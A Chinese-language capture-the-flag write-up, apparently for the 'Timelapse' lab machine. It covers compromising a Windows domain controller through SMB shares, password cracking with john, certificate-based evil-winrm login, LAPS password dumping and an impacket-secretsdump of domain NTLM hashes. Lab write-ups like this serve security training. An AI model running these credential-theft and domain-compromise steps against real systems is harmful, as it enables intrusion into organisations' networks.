基本信息

端口扫描

明显的windows域机器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ nmap -sC -sV -Pn 10.10.11.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 13:32 CST
Nmap scan report for 10.10.11.152
Host is up (0.19s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-07 13:34:30Z)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-04-07T13:34:50
|_  start_date: N/A
|_clock-skew: 7h59m58s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.96 seconds

SMB

smb未授权访问,有个shares:

Shares

两个目录,dev里是winrm backup,HelpDesk里是LAPS相关文件:

winrm_backup.zip

压缩包有密码,可以破解出来:

1
2
3
zip2john winrm_backup.zip > hash.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
supremelegacy

解压出来一个pfx证书文件,同样需要密码,john破解:

1
2
3
pfx2john legacyy_dev_auth.pfx > hash2.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt
thuglegacy

根据文件名,可以知道这个文件是连接winrm所需的认证证书文件,所以就是从pfx文件提取出key后通过winrm连接

user flag

提取出key,提示输入密码的地方均使用破解出的证书密码:

1
2
3
4
openssl pkcs12 -in legacyy_dev_auth.pfx  -nocerts -out priv.key
openssl pkcs12 -in legacyy_dev_auth.pfx  -clcerts -nokeys -out pfx.crt

evil-winrm -i 10.10.11.152 -c ./pfx.crt -k ./priv.key -p -u -S

提权信息

运行winpeas之类的,可以在powershell命令历史文件中发现一个密码:

1
2
3
4
5
6
7
8
9
10
11
12
type C:\Users\legacyy\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt

whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

laps

前面可以看到laps相关,后续就是使用svc_deploy账号去dump laps:

1
2
3
4
5
6
evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

DC01  dc01.timelapse.htb kF5xw4;8rU#Tv0xn2O#{v0Pl 132942063964961821

root flag

laps得到的密码就是Administrator密码,root.txt在TRX桌面:

hashes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ impacket-secretsdump -just-dc-ntlm Administrator@10.10.11.152
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:de0a7e3d696666f33e663464f1800940:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2960d580f05cd511b3da3d3663f3cb37:::
timelapse.htb\thecybergeek:1601:aad3b435b51404eeaad3b435b51404ee:c81875d2b3cd404f3c8eadc820248f06:::
timelapse.htb\payl0ad:1602:aad3b435b51404eeaad3b435b51404ee:f63b1edaad2ee253c3c228c6e08d1ea0:::
timelapse.htb\legacyy:1603:aad3b435b51404eeaad3b435b51404ee:93da975bcea111839cc584f2f528d63e:::
timelapse.htb\sinfulz:1604:aad3b435b51404eeaad3b435b51404ee:72b236d9b0d49860267f752f1dfc8103:::
timelapse.htb\babywyrm:1605:aad3b435b51404eeaad3b435b51404ee:d47c7e33d6911bb742fdf040af2e80da:::
timelapse.htb\svc_deploy:3103:aad3b435b51404eeaad3b435b51404ee:c912f3533b7114980dd7b6094be1a9d8:::
timelapse.htb\TRX:5101:aad3b435b51404eeaad3b435b51404ee:4c7121d35cd421cbbd3e44ce83bc923e:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:cac5b5386bf075ebd4699b205150cd52:::
DB01$:1606:aad3b435b51404eeaad3b435b51404ee:d9c629d35e3311abba1631dba29ead96:::
WEB01$:1607:aad3b435b51404eeaad3b435b51404ee:3b2910d8e6c79bbb20e8842ea4a9aeac:::
DEV01$:1608:aad3b435b51404eeaad3b435b51404ee:463c7639ff204594dfbebbe71b3c6dbb:::
[*] Cleaning up...

参考资料